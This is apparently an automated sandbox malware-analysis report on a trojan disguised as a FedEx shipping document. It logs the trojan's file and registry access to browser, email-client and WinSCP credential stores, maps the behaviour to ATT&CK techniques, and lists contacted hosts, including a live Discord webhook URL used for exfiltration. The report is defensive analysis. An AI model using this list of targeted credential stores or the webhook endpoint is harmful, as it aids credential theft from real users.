        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: Yara match | File source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR
MITRE ATT&CK Matrix (columns are tactics, one row per line, cells separated by " | "; digits in front of a technique name are the report's count badges, kept as extracted)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | 21 Input Capture | 131 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 21 Input Capture | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | 1 Data from Local System | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Software Packing | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

Source | Detection | Scanner | Label
FeDex_shipping_document.exe | 38% | ReversingLabs | Win32.Trojan.Generic
FeDex_shipping_document.exe | 34% | Virustotal |
FeDex_shipping_document.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
1.2.FeDex_shipping_document.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035

Source | Detection | Scanner | Label
discord.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | true | | unknown
api4.ipify.org | 64.185.227.155 | true | false | | high
api.ipify.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj | true | Avira URL Cloud: safe | unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.fontbureau.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.fontbureau.com/designersGFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://discord.comFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers/?FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers?FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tiro.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://discord.comFeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://discord.comD8FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.goodfont.co.krFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comlFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/cabarga.htmlNFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/cTheFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.ipify.orgFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://fontfabrik.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
http://www.fontbureau.com/designers/frere-jones.html | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023 | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com4 | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
64.185.227.155 | api4.ipify.org | United States | 18450 | WEBNXUS | false
162.159.135.232 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                              Joe Sandbox Version:37.0.0 Beryl
